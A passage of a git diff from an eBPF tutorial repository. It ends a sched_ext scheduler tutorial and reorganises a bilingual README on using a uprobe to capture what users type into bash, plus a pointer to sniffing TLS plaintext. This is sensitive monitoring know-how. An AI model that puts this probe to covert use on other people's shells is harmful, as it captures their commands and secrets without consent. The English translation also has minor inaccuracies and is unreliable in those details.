implementation of scx_simple defines how tasks are selected, enqueued, dispatched, and managed. Here's a high-level overview: - -1. **Initialization and Licensing:** - - The scheduler is licensed under GPL. - - A global variable `fifo_sched` determines the scheduling mode (FIFO or weighted vtime). - -2. **Dispatch Queue (DSQ) Management:** - - A shared DSQ (`SHARED_DSQ`) with ID 0 is created to handle task dispatching. - - A `stats` map tracks the number of tasks queued locally and globally. - -3. **CPU Selection (`simple_select_cpu`):** - - Selects the CPU for a waking task. - - If the selected CPU is idle, the task is immediately dispatched to the local DSQ. - -4. **Task Enqueueing (`simple_enqueue`):** - - Depending on the `fifo_sched` flag, tasks are either dispatched to the shared DSQ in FIFO mode or to a priority queue based on virtual time. - - Virtual time (`vtime`) ensures fair scheduling by accounting for task execution time and weight. - -5. **Task Dispatching (`simple_dispatch`):** - - Consumes tasks from the shared DSQ and assigns them to CPUs. - -6. **Running and Stopping Tasks (`simple_running` & `simple_stopping`):** - - Manages the progression of virtual time for tasks, ensuring that scheduling decisions remain fair and balanced. - -7. **Enabling and Exiting:** - - Handles the enabling of the scheduler and records exit information for debugging. - -This modular structure allows scx_simple to be both simple and effective, providing a clear example of how to implement custom scheduling policies using eBPF. - -### User-Space Implementation - -```c -static void read_stats(struct scx_simple *skel, __u64 *stats) -{ - int nr_cpus = libbpf_num_possible_cpus(); - __u64 cnts[2][nr_cpus]; - __u32 idx; - - memset(stats, 0, sizeof(stats[0]) * 2); - - for (idx = 0; idx < 2; idx++) { - int ret, cpu; - - ret = bpf_map_lookup_elem(bpf_map__fd(skel->maps.stats), - &idx, cnts[idx]); - if (ret < 0) - continue; - for (cpu = 0; cpu < nr_cpus; cpu++) - stats[idx] += cnts[idx][cpu]; - } -} - -int main(int argc, char **argv) -{ - struct scx_simple *skel; - struct bpf_link *link; - __u32 opt; - __u64 ecode; - - libbpf_set_print(libbpf_print_fn); - signal(SIGINT, sigint_handler); - signal(SIGTERM, sigint_handler); -restart: - skel = SCX_OPS_OPEN(simple_ops, scx_simple); - - while ((opt = getopt(argc, argv, "fvh")) != -1) { - switch (opt) { - case 'f': - skel->rodata->fifo_sched = true; - break; - case 'v': - verbose = true; - break; - default: - fprintf(stderr, help_fmt, basename(argv[0])); - return opt != 'h'; - } - } - - SCX_OPS_LOAD(skel, simple_ops, scx_simple, uei); - link = SCX_OPS_ATTACH(skel, simple_ops, scx_simple); - - while (!exit_req && !UEI_EXITED(skel, uei)) { - __u64 stats[2]; - - read_stats(skel, stats); - printf("local=%llu global=%llu\n", stats[0], stats[1]); - fflush(stdout); - sleep(1); - } - - bpf_link__destroy(link); - ecode = UEI_REPORT(skel, uei); - scx_simple__destroy(skel); - - if (UEI_ECODE_RESTART(ecode)) - goto restart; - return 0; -} -``` - -#### User-Space Breakdown - -The user-space component is responsible for interacting with the BPF scheduler, managing its lifecycle, and monitoring its performance. Here's a snapshot of its responsibilities: - -1. **Statistics Collection (`read_stats`):** - - Reads the number of tasks queued locally and globally from the BPF maps. - - Aggregates statistics across all CPUs for reporting. - -2. **Main Function Workflow:** - - **Initialization:** Sets up libbpf, handles signal interrupts, and opens the scx_simple BPF skeleton. - - **Argument Parsing:** Processes command-line options to toggle FIFO scheduling and verbosity. - - **Loading and Attaching:** Loads the BPF program and attaches it to the scheduler. - - **Monitoring Loop:** Continuously reads and prints scheduling statistics every second. - - **Cleanup:** Destroys BPF links and handles potential restarts based on exit codes. - -This user-space program provides a straightforward interface to monitor and control the scx_simple scheduler, making it easier to understand its behavior in real-time. - -## Deep Dive into Key Concepts - -To fully grasp how scx_simple operates, let's explore some of the underlying concepts and mechanisms: - -### Dispatch Queues (DSQs) - -DSQs are central to sched_ext's operation, acting as buffers where tasks are queued before being dispatched to CPUs. They can function as either FIFO queues or priority queues based on virtual time. - -- **Local DSQs (`SCX_DSQ_LOCAL`):** Each CPU has its own local DSQ, ensuring that tasks can be dispatched and consumed efficiently without contention. -- **Global DSQ (`SCX_DSQ_GLOBAL`):** A shared queue where tasks from all CPUs can be queued, providing a fallback when local queues are empty. -- **Custom DSQs:** Developers can create additional DSQs using `scx_bpf_create_dsq()` for more specialized scheduling needs. - -### Virtual Time (vtime) - -Virtual time is a mechanism to ensure fairness in scheduling by tracking how much time a task has consumed relative to its weight. In scx_simple's weighted vtime mode, tasks with higher weights consume virtual time more slowly, allowing lower-weighted tasks to run more frequently. - -### Scheduling Cycle - -Understanding the scheduling cycle is crucial for modifying or extending scx_simple: - -1. **Task Wakeup:** - - `ops.select_cpu()` is invoked to select an optimal CPU for the waking task. - - If the selected CPU is idle, the task is dispatched immediately to the local DSQ. - -2. **Task Enqueueing:** - - `ops.enqueue()` decides whether to dispatch the task to the global DSQ, a local DSQ, or a custom DSQ based on the scheduling mode. - -3. **Task Dispatching:** - - When a CPU is ready to schedule, it first checks its local DSQ, then the global DSQ, and finally invokes `ops.dispatch()` if needed. - -4. **Task Execution:** - - The CPU executes the selected task, updating its virtual time and ensuring fair scheduling. - -This cycle ensures that tasks are scheduled efficiently while maintaining fairness and responsiveness. - -## Compiling and Running scx_simple - -Getting scx_simple up and running involves setting up the necessary toolchain and configuring the kernel appropriately. Here's how you can compile and execute the example scheduler. - -### Toolchain Dependencies - -Before compiling scx_simple, ensure you have the following tools installed: - -1. **clang >= 16.0.0** - - Required for compiling BPF programs. While GCC is working on BPF support, it lacks essential features like BTF type tags necessary for certain functionalities. - -2. **pahole >= 1.25** - - Used to generate BTF from DWARF, which is crucial for type information in BPF programs. - -3. **rust >= 1.70.0** - - If you're working with Rust-based schedulers, ensure you have the appropriate Rust toolchain version. - -Additionally, tools like `make` are required for building the examples. - -### Kernel Configuration - -To enable and use sched_ext, ensure the following kernel configuration options are set: - -```plaintext -CONFIG_BPF=y -CONFIG_SCHED_CLASS_EXT=y -CONFIG_BPF_SYSCALL=y -CONFIG_BPF_JIT=y -CONFIG_DEBUG_INFO_BTF=y -CONFIG_BPF_JIT_ALWAYS_ON=y -CONFIG_BPF_JIT_DEFAULT_ON=y -CONFIG_PAHOLE_HAS_SPLIT_BTF=y -CONFIG_PAHOLE_HAS_BTF_TAG=y -``` - -These configurations enable the necessary features for BPF scheduling and ensure that sched_ext operates correctly. - -### Building scx_simple - -Navigate to the kernel's `tools/sched_ext/` directory and run: - -```bash -make -``` - -This command compiles the scx_simple scheduler along with its dependencies. - -### Running scx_simple - -Once compiled, you can execute the user-space program to load and monitor the scheduler: - -```bash -./scx_simple -f -``` - -The `-f` flag enables FIFO scheduling mode. You can also use `-v` for verbose output or `-h` for help. - -As the program runs, it will display the number of tasks queued locally and globally every second: - -```plaintext -local=123 global=456 -local=124 global=457 -... -``` - -### Switching Between sched_ext and CFS - -sched_ext operates alongside the default Completely Fair Scheduler (CFS). You can switch between sched_ext and CFS dynamically: - -- **Enable sched_ext:** Load the BPF scheduler using scx_simple. -- **Disable sched_ext:** Terminate the scx_simple program, reverting all tasks back to CFS. - -Additionally, using SysRq key sequences like `SysRq-S` can help manage the scheduler's state and trigger debug dumps with `SysRq-D`. - -## Summary and Next Steps - -In this tutorial, we've introduced the **sched_ext** scheduler class and walked through a minimal example, **scx_simple**, demonstrating how to define custom scheduling behaviors using eBPF programs. We've covered the architecture, key concepts like DSQs and virtual time, and provided step-by-step instructions for compiling and running the scheduler. - -By mastering scx_simple, you're well-equipped to design and implement more sophisticated scheduling policies tailored to your specific requirements. Whether you're optimizing for performance, fairness, or specific workload characteristics, sched_ext and eBPF offer the flexibility and power to achieve your goals. - -> Ready to take your eBPF skills to the next level? Dive deeper into our tutorials and explore more examples by visiting our [tutorial repository](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our [website](https://eunomia.dev/tutorials/). - -## References - -- **sched_ext Repository:** [https://github.com/sched-ext/scx](https://github.com/sched-ext/scx) -- **Linux Kernel Documentation:** [Scheduler Ext Documentation](https://www.kernel.org/doc/html/next/scheduler/sched-ext.html) -- **Kernel Source Tree:** [Linux Kernel sched_ext Tools](https://github.com/torvalds/linux/tree/master/tools/sched_ext) -- **eBPF Official Documentation:** [https://ebpf.io/docs/](https://ebpf.io/docs/) -- **libbpf Documentation:** [https://github.com/libbpf/libbpf](https://github.com/libbpf/libbpf) - -Feel free to explore these resources to expand your understanding and continue your journey into advanced eBPF programming! diff --git a/src/5-uprobe-bashreadline/README.md b/src/5-uprobe-bashreadline/README.md index 20e321a..6a9f795 100644 --- a/src/5-uprobe-bashreadline/README.md +++ b/src/5-uprobe-bashreadline/README.md @@ -1,24 +1,24 @@ -# eBPF 入门开发实践教程五:在 eBPF 中使用 uprobe 捕获 bash 的 readline 函数调用 +# eBPF Tutorial by Example 5: Capturing readline Function Calls with Uprobe -eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具,它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel that allows developers to dynamically load, update, and run user-defined code at runtime. -本文是 eBPF 入门开发实践教程的第五篇,主要介绍如何使用 uprobe 捕获 bash 的 readline 函数调用。 +This article is the fifth part of the eBPF Tutorial by Example, which mainly introduces how to capture readline function calls in bash using uprobe. -## 什么是uprobe +## What is uprobe -uprobe是一种用户空间探针,uprobe探针允许在用户空间程序中动态插桩,插桩位置包括:函数入口、特定偏移处,以及函数返回处。当我们定义uprobe时,内核会在附加的指令上创建快速断点指令(x86机器上为int3指令),当程序执行到该指令时,内核将触发事件,程序陷入到内核态,并以回调函数的方式调用探针函数,执行完探针函数再返回到用户态继续执行后序的指令。 +uprobe is a user-space probe that allows dynamic instrumentation in user-space programs. The probe locations include function entry, specific offsets, and function returns. When we define an uprobe, the kernel creates fast breakpoint instructions (int3 instructions on x86 machines) on the attached instructions. When the program executes this instruction, the kernel triggers an event, causing the program to enter kernel mode and call the probe function through a callback function. After executing the probe function, the program returns to user mode to continue executing subsequent instructions. -uprobe基于文件,当一个二进制文件中的一个函数被跟踪时,所有使用到这个文件的进程都会被插桩,包括那些尚未启动的进程,这样就可以在全系统范围内跟踪系统调用。 +uprobe is file-based. When a function in a binary file is traced, all processes that use the file are instrumented, including those that have not yet been started, allowing system calls to be tracked system-wide. -uprobe适用于在用户态去解析一些内核态探针无法解析的流量,例如http2流量(报文header被编码,内核无法解码),https流量(加密流量,内核无法解密)。具体可以参考 [eBPF 实践教程:使用 uprobe 捕获多种库的 SSL/TLS 明文数据](../30-sslsniff/README.md) 中的例子。 +uprobe is suitable for parsing some traffic in user mode that cannot be resolved by kernel mode probes, such as HTTP/2 traffic (where the header is encoded and cannot be decoded by the kernel) and HTTPS traffic (which is encrypted and cannot be decrypted by the kernel). For more information, see the example in [eBPF Tutorial by Example: Capturing SSL/TLS Plaintext Data from Multiple Libraries with Uprobe](../30-sslsniff/README.md). -Uprobe 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容,避免了内核态和用户态之间的上下文切换,从而提高了 eBPF 程序的执行效率。对于 uprobe 而言,bpftime 的性能开销比 kernel 小一个数量级。 +Uprobe in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user mode and is compatible with kernel mode eBPF, avoiding context switching between kernel mode and user mode, thereby improving the execution efficiency of eBPF programs by 10 times. -## 使用 uprobe 捕获 bash 的 readline 函数调用 +## Capturing readline Function Calls in bash using uprobe -uprobe 是一种用于捕获用户空间函数调用的 eBPF 的探针,我们可以通过它来捕获用户空间程序调用的系统函数。 +uprobe is an eBPF probe used to capture user-space function calls, allowing us to capture system functions called by user-space programs. -例如,我们可以使用 uprobe 来捕获 bash 的 readline 函数调用,从而获取用户在 bash 中输入的命令行。示例代码如下: +For example, we can use uprobe to capture readline function calls in bash and get the command line input from the user. The example code is as follows: ```c #include @@ -28,16 +28,6 @@ uprobe 是一种用于捕获用户空间函数调用的 eBPF 的探针,我们 #define TASK_COMM_LEN 16 #define MAX_LINE_SIZE 80 -/* Format of u[ret]probe section definition supporting auto-attach: - * u[ret]probe/binary:function[+offset] - * - * binary can be an absolute/relative path or a filename; the latter is resolved to a - * full binary path via bpf_program__attach_uprobe_opts. - * - * Specifying uprobe+ ensures we carry out strict matching; either "uprobe" must be - * specified (and auto-attach is not possible) or the above format is specified for - * auto-attach. - */ SEC("uretprobe//bin/bash:readline") int BPF_KRETPROBE(printret, const void *ret) { @@ -49,7 +39,7 @@ int BPF_KRETPROBE(printret, const void *ret) return 0; bpf_get_current_comm(&comm, sizeof(comm)); - + pid = bpf_get_current_pid_tgid() >> 32; bpf_probe_read_user_str(str, sizeof(str), ret); @@ -61,65 +51,63 @@ int BPF_KRETPROBE(printret, const void *ret) char LICENSE[] SEC("license") = "GPL"; ``` -这段代码的作用是在 bash 的 readline 函数返回时执行指定的 BPF_KRETPROBE 函数,即 printret 函数。 +The purpose of this code is to execute the specified BPF_PROBE function (printret function) when the readline function in bash returns. -在 printret 函数中,我们首先获取了调用 readline 函数的进程的进程名称和进程 ID,然后通过 bpf_probe_read_user_str 函数读取了用户输入的命令行字符串,最后通过 bpf_printk 函数打印出进程 ID、进程名称和输入的命令行字符串。 +In the printret function, we first obtain the process name and process ID of the process calling the readline function. Then, we use the bpf_probe_read_user_str function to read the user input command line string. Lastly, we use the bpf_printk function to print the process ID, process name, and input command line string. -除此之外,我们还需要通过 SEC 宏来定义 uprobe 探针,并使用 BPF_KRETPROBE 宏来定义探针函数。 - -在 SEC 宏中,我们需要指定 uprobe 的类型、要捕获的二进制文件的路径和要捕获的函数名称。例如,上面的代码中的 SEC 宏的定义如下: +In addition, we also need to define the uprobe probe using the SEC macro and define the probe function using the BPF_KRETPROBE macro.In the `SEC` macro in the code above, we need to specify the type of the uprobe, the path of the binary file to capture, and the name of the function to capture. For example, the definition of the `SEC` macro in the code above is as follows: ```c SEC("uprobe//bin/bash:readline") ``` -这表示我们要捕获的是 /bin/bash 二进制文件中的 readline 函数。 +This indicates that we want to capture the `readline` function in the `/bin/bash` binary file. -接下来,我们需要使用 BPF_KRETPROBE 宏来定义探针函数,例如: +Next, we need to use the `BPF_KRETPROBE` macro to define the probe function. For example: ```c BPF_KRETPROBE(printret, const void *ret) ``` -这里的 printret 是探针函数的名称,const void *ret 是探针函数的参数,它代表被捕获的函数的返回值。 +Here, `printret` is the name of the probe function, and `const void *ret` is the parameter of the probe function, which represents the return value of the captured function. -然后,我们使用了 bpf_get_current_comm 函数获取当前任务的名称,并将其存储在 comm 数组中。 +Then, we use the `bpf_get_current_comm` function to get the name of the current task and store it in the `comm` array. ```c - bpf_get_current_comm(&comm, sizeof(comm)); +bpf_get_current_comm(&comm, sizeof(comm)); ``` -使用 bpf_get_current_pid_tgid 函数获取当前进程的 PID,并将其存储在 pid 变量中。 +We use the `bpf_get_current_pid_tgid` function to get the PID of the current process and store it in the `pid` variable. ```c - pid = bpf_get_current_pid_tgid() >> 32; +pid = bpf_get_current_pid_tgid() >> 32; ``` -使用 bpf_probe_read_user_str 函数从用户空间读取 readline 函数的返回值,并将其存储在 str 数组中。 +We use the `bpf_probe_read_user_str` function to read the return value of the `readline` function from the user space and store it in the `str` array. ```c - bpf_probe_read_user_str(str, sizeof(str), ret); +bpf_probe_read_user_str(str, sizeof(str), ret); ``` -最后使用 bpf_printk 函数输出 PID、任务名称和用户输入的字符串。 +Finally, we use the `bpf_printk` function to output the PID, task name, and user input string. ```c - bpf_printk("PID %d (%s) read: %s ", pid, comm, str); +bpf_printk("PID %d (%s) read: %s ", pid, comm, str); ``` -eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 +eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain combined with Wasm. Its purpose is to simplify the development, build, distribution, and running of eBPF programs. You can refer to to download and install the ecc compiler toolchain and ecli runtime. We use eunomia-bpf to compile and run this example. -编译运行上述代码: +Compile and run the above code: ```console $ ecc bashreadline.bpf.c Compiling bpf object... Packing ebpf object and config into package.json... $ sudo ecli run package.json -Runing eBPF program... +Running eBPF program... ``` -运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出: +After running this program, you can view the output of the eBPF program by checking the file `/sys/kernel/debug/tracing/trace_pipe`: ```console $ sudo cat /sys/kernel/debug/tracing/trace_pipe @@ -127,12 +115,10 @@ $ sudo cat /sys/kernel/debug/tracing/trace_pipe bash-32969 [000] d..31 64002.056951: bpf_trace_printk: PID 32969 (bash) read: fff ``` -可以看到,我们成功的捕获了 bash 的 readline 函数调用,并获取了用户在 bash 中输入的命令行。 +You can see that we have successfully captured the `readline` function call of `bash` and obtained the command line entered by the user in `bash`. -## 总结 +## Summary -在上述代码中,我们使用了 SEC 宏来定义了一个 uprobe 探针,它指定了要捕获的用户空间程序 (bin/bash) 和要捕获的函数 (readline)。此外,我们还使用了 BPF_KRETPROBE 宏来定义了一个用于处理 readline 函数返回值的回调函数 (printret)。该函数可以获取到 readline 函数的返回值,并将其打印到内核日志中。通过这样的方式,我们就可以使用 eBPF 来捕获 bash 的 readline 函数调用,并获取用户在 bash 中输入的命令行。 +In the above code, we used the `SEC` macro to define an uprobe probe, which specifies the user space program (`bin/bash`) to be captured and the function (`readline`) to be captured. In addition, we used the `BPF_KRETPROBE` macro to define a callback function (`printret`) for handling the return value of the `readline` function. This function can retrieve the return value of the `readline` function and print it to the kernel log. In this way, we can use eBPF to capture the `readline` function call of `bash` and obtain the command line entered by the user in `bash`. -更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: - -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository or website to get more examples and complete tutorials. diff --git a/src/5-uprobe-bashreadline/README.zh.md b/src/5-uprobe-bashreadline/README.zh.md new file mode 100644 index 0000000..20e321a --- /dev/null +++ b/src/5-uprobe-bashreadline/README.zh.md @@ -0,0 +1,138 @@ +# eBPF 入门开发实践教程五:在 eBPF 中使用 uprobe 捕获 bash 的 readline 函数调用 + +eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具,它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 + +本文是 eBPF 入门开发实践教程的第五篇,主要介绍如何使用 uprobe 捕获 bash 的 readline 函数调用。 + +## 什么是uprobe + +uprobe是一种用户空间探针,uprobe探针允许在用户空间程序中动态插桩,插桩位置包括:函数入口、特定偏移处,以及函数返回处。当我们定义uprobe时,内核会在附加的指令上创建快速断点指令(x86机器上为int3指令),当程序执行到该指令时,内核将触发事件,程序陷入到内核态,并以回调函数的方式调用探针函数,执行完探针函数再返回到用户态继续执行后序的指令。 + +uprobe基于文件,当一个二进制文件中的一个函数被跟踪时,所有使用到这个文件的进程都会被插桩,包括那些尚未启动的进程,这样就可以在全系统范围内跟踪系统调用。 + +uprobe适用于在用户态去解析一些内核态探针无法解析的流量,例如http2流量(报文header被编码,内核无法解码),https流量(加密流量,内核无法解密)。具体可以参考 [eBPF 实践教程:使用 uprobe 捕获多种库的 SSL/TLS 明文数据](../30-sslsniff/README.md) 中的例子。 + +Uprobe 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容,避免了内核态和用户态之间的上下文切换,从而提高了 eBPF 程序的执行效率。对于 uprobe 而言,bpftime 的性能开销比 kernel 小一个数量级。 + +## 使用 uprobe 捕获 bash 的 readline 函数调用 + +uprobe 是一种用于捕获用户空间函数调用的 eBPF 的探针,我们可以通过它来捕获用户空间程序调用的系统函数。 + +例如,我们可以使用 uprobe 来捕获 bash 的 readline 函数调用,从而获取用户在 bash 中输入的命令行。示例代码如下: + +```c +#include +#include +#include + +#define TASK_COMM_LEN 16 +#define MAX_LINE_SIZE 80 + +/* Format of u[ret]probe section definition supporting auto-attach: + * u[ret]probe/binary:function[+offset] + * + * binary can be an absolute/relative path or a filename; the latter is resolved to a + * full binary path via bpf_program__attach_uprobe_opts. + * + * Specifying uprobe+ ensures we carry out strict matching; either "uprobe" must be + * specified (and auto-attach is not possible) or the above format is specified for + * auto-attach. + */ +SEC("uretprobe//bin/bash:readline") +int BPF_KRETPROBE(printret, const void *ret) +{ + char str[MAX_LINE_SIZE]; + char comm[TASK_COMM_LEN]; + u32 pid; + + if (!ret) + return 0; + + bpf_get_current_comm(&comm, sizeof(comm)); + + pid = bpf_get_current_pid_tgid() >> 32; + bpf_probe_read_user_str(str, sizeof(str), ret); + + bpf_printk("PID %d (%s) read: %s ", pid, comm, str); + + return 0; +}; + +char LICENSE[] SEC("license") = "GPL"; +``` + +这段代码的作用是在 bash 的 readline 函数返回时执行指定的 BPF_KRETPROBE 函数,即 printret 函数。 + +在 printret 函数中,我们首先获取了调用 readline 函数的进程的进程名称和进程 ID,然后通过 bpf_probe_read_user_str 函数读取了用户输入的命令行字符串,最后通过 bpf_printk 函数打印出进程 ID、进程名称和输入的命令行字符串。 + +除此之外,我们还需要通过 SEC 宏来定义 uprobe 探针,并使用 BPF_KRETPROBE 宏来定义探针函数。 + +在 SEC 宏中,我们需要指定 uprobe 的类型、要捕获的二进制文件的路径和要捕获的函数名称。例如,上面的代码中的 SEC 宏的定义如下: + +```c +SEC("uprobe//bin/bash:readline") +``` + +这表示我们要捕获的是 /bin/bash 二进制文件中的 readline 函数。 + +接下来,我们需要使用 BPF_KRETPROBE 宏来定义探针函数,例如: + +```c +BPF_KRETPROBE(printret, const void *ret) +``` + +这里的 printret 是探针函数的名称,const void *ret 是探针函数的参数,它代表被捕获的函数的返回值。 + +然后,我们使用了 bpf_get_current_comm 函数获取当前任务的名称,并将其存储在 comm 数组中。 + +```c + bpf_get_current_comm(&comm, sizeof(comm)); +``` + +使用 bpf_get_current_pid_tgid 函数获取当前进程的 PID,并将其存储在 pid 变量中。 + +```c + pid = bpf_get_current_pid_tgid() >> 32; +``` + +使用 bpf_probe_read_user_str 函数从用户空间读取 readline 函数的返回值,并将其存储在 str 数组中。 + +```c + bpf_probe_read_user_str(str, sizeof(str), ret); +``` + +最后使用 bpf_printk 函数输出 PID、任务名称和用户输入的字符串。 + +```c + bpf_printk("PID %d (%s) read: %s ", pid, comm, str); +``` + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 + +编译运行上述代码: + +```console +$ ecc bashreadline.bpf.c +Compiling bpf object... +Packing ebpf object and config into package.json... +$ sudo ecli run package.json +Runing eBPF program... +``` + +运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe + bash-32969 [000] d..31 64001.375748: bpf_trace_printk: PID 32969 (bash) read: fff + bash-32969 [000] d..31 64002.056951: bpf_trace_printk: PID 32969 (bash) read: fff +``` + +可以看到,我们成功的捕获了 bash 的 readline 函数调用,并获取了用户在 bash 中输入的命令行。 + +## 总结 + +在上述代码中,我们使用了 SEC 宏来定义了一个 uprobe 探针,它指定了要捕获的用户空间程序 (bin/bash) 和要捕获的函数 (readline)。此外,我们还使用了 BPF_KRETPROBE 宏来定义了一个用于处理 readline 函数返回值的回调函数 (printret)。该函数可以获取到 readline 函数的返回值,并将其打印到内核日志中。通过这样的方式,我们就可以使用 eBPF 来捕获 bash 的 readline 函数调用,并获取用户在 bash 中输入的命令行。 + +更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/5-uprobe-bashreadline/README_en.md b/src/5-uprobe-bashreadline/README_en.md deleted file mode 100644 index 6a9f795..0000000 --- a/src/5-uprobe-bashreadline/README_en.md +++ /dev/null @@ -1,124 +0,0 @@ -# eBPF Tutorial by Example 5: Capturing readline Function Calls with Uprobe - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel that allows developers to dynamically load, update, and run user-defined code at runtime. - -This article is the fifth part of the eBPF Tutorial by Example, which mainly introduces how to capture readline function calls in bash using uprobe. - -## What is uprobe - -uprobe is a user-space probe that allows dynamic instrumentation in user-space programs. The probe locations include function entry, specific offsets, and function returns. When we define an uprobe, the kernel creates fast breakpoint instructions (int3 instructions on x86 machines) on the attached instructions. When the program executes this instruction, the kernel triggers an event, causing the program to enter kernel mode and call the probe function through a callback function. After executing the probe function, the program returns to user mode to continue executing subsequent instructions. - -uprobe is file-based. When a function in a binary file is traced, all processes that use the file are instrumented, including those that have not yet been started, allowing system calls to be tracked system-wide. - -uprobe is suitable for parsing some traffic in user mode that cannot be resolved by kernel mode probes, such as HTTP/2 traffic (where the header is encoded and cannot be decoded by the kernel) and HTTPS traffic (which is encrypted and cannot be decrypted by the kernel). For more information, see the example in [eBPF Tutorial by Example: Capturing SSL/TLS Plaintext Data from Multiple Libraries with Uprobe](../30-sslsniff/README.md). - -Uprobe in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user mode and is compatible with kernel mode eBPF, avoiding context switching between kernel mode and user mode, thereby improving the execution efficiency of eBPF programs by 10 times. - -## Capturing readline Function Calls in bash using uprobe - -uprobe is an eBPF probe used to capture user-space function calls, allowing us to capture system functions called by user-space programs. - -For example, we can use uprobe to capture readline function calls in bash and get the command line input from the user. The example code is as follows: - -```c -#include -#include -#include - -#define TASK_COMM_LEN 16 -#define MAX_LINE_SIZE 80 - -SEC("uretprobe//bin/bash:readline") -int BPF_KRETPROBE(printret, const void *ret) -{ - char str[MAX_LINE_SIZE]; - char comm[TASK_COMM_LEN]; - u32 pid; - - if (!ret) - return 0; - - bpf_get_current_comm(&comm, sizeof(comm)); - - pid = bpf_get_current_pid_tgid() >> 32; - bpf_probe_read_user_str(str, sizeof(str), ret); - - bpf_printk("PID %d (%s) read: %s ", pid, comm, str); - - return 0; -}; - -char LICENSE[] SEC("license") = "GPL"; -``` - -The purpose of this code is to execute the specified BPF_PROBE function (printret function) when the readline function in bash returns. - -In the printret function, we first obtain the process name and process ID of the process calling the readline function. Then, we use the bpf_probe_read_user_str function to read the user input command line string. Lastly, we use the bpf_printk function to print the process ID, process name, and input command line string. - -In addition, we also need to define the uprobe probe using the SEC macro and define the probe function using the BPF_KRETPROBE macro.In the `SEC` macro in the code above, we need to specify the type of the uprobe, the path of the binary file to capture, and the name of the function to capture. For example, the definition of the `SEC` macro in the code above is as follows: - -```c -SEC("uprobe//bin/bash:readline") -``` - -This indicates that we want to capture the `readline` function in the `/bin/bash` binary file. - -Next, we need to use the `BPF_KRETPROBE` macro to define the probe function. For example: - -```c -BPF_KRETPROBE(printret, const void *ret) -``` - -Here, `printret` is the name of the probe function, and `const void *ret` is the parameter of the probe function, which represents the return value of the captured function. - -Then, we use the `bpf_get_current_comm` function to get the name of the current task and store it in the `comm` array. - -```c -bpf_get_current_comm(&comm, sizeof(comm)); -``` - -We use the `bpf_get_current_pid_tgid` function to get the PID of the current process and store it in the `pid` variable. - -```c -pid = bpf_get_current_pid_tgid() >> 32; -``` - -We use the `bpf_probe_read_user_str` function to read the return value of the `readline` function from the user space and store it in the `str` array. - -```c -bpf_probe_read_user_str(str, sizeof(str), ret); -``` - -Finally, we use the `bpf_printk` function to output the PID, task name, and user input string. - -```c -bpf_printk("PID %d (%s) read: %s ", pid, comm, str); -``` - -eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain combined with Wasm. Its purpose is to simplify the development, build, distribution, and running of eBPF programs. You can refer to to download and install the ecc compiler toolchain and ecli runtime. We use eunomia-bpf to compile and run this example. - -Compile and run the above code: - -```console -$ ecc bashreadline.bpf.c -Compiling bpf object... -Packing ebpf object and config into package.json... -$ sudo ecli run package.json -Running eBPF program... -``` - -After running this program, you can view the output of the eBPF program by checking the file `/sys/kernel/debug/tracing/trace_pipe`: - -```console -$ sudo cat /sys/kernel/debug/tracing/trace_pipe - bash-32969 [000] d..31 64001.375748: bpf_trace_printk: PID 32969 (bash) read: fff - bash-32969 [000] d..31 64002.056951: bpf_trace_printk: PID 32969 (bash) read: fff -``` - -You can see that we have successfully captured the `readline` function call of `bash` and obtained the command line entered by the user in `bash`. - -## Summary - -In the above code, we used the `SEC` macro to define an uprobe probe, which specifies the user space program (`bin/bash`) to be captured and the function (`readline`) to be captured. In addition, we used the `BPF_KRETPROBE` macro to define a callback function (`printret`) for handling the return value of the `readline` function. This function can retrieve the return value of the `readline` function and print it to the kernel log. In this way, we can use eBPF to capture the `readline` function call of `bash` and obtain the command line entered by the user in `bash`. - -If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository or website to get more examples and complete tutorials. diff --git a/src/6-sigsnoop/README.md b/src/6-sigsnoop/README.md index 2a8715b..7af9ca5 